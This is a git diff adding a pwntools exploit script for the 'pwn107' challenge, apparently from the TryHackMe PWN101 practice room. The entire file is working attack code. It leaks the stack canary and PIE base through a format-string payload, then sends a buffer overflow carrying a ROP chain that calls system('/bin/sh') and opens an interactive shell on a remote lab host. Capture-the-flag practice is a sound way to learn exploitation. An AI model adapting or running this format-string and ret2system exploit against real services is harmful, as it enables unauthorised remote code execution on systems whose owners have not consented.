diff --git a/thm_pwn101/pwn107/a.py b/thm_pwn101/pwn107/a.py
new file mode 100644
index 0000000..166fdf8
--- /dev/null
+++ b/thm_pwn101/pwn107/a.py
@@ -0,0 +1,37 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn107", checksec=False)
+# r = process()
+r = remote("10.10.74.244", 9007)
+
+# funcs
+s = lambda a: r.sendafter(b"? ", a)
+ss = lambda a: r.send(a)
+
+# leak
+s(b"%13$p.%19$p")
+r.recvuntil(b": ")
+leaks = r.recvlineS().strip().split(".")
+canary = int(leaks[0], 16)
+log.info("canary: %#x", canary)
+target.address = int(leaks[1][:14], 16) - 0x992
+log.info("pie: %#x", target.address)
+system = target.sym.system
+sh = next(target.search(b"/bin/sh\0"))
+
+# gadgets
+pop_rdi = target.address + 0x0af3
+
+# pop
+buf = b"A"*24
+buf += p64(canary)
+buf += b"A"*8
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+ss(buf)
+
+r.interactive()
\ No newline at end of file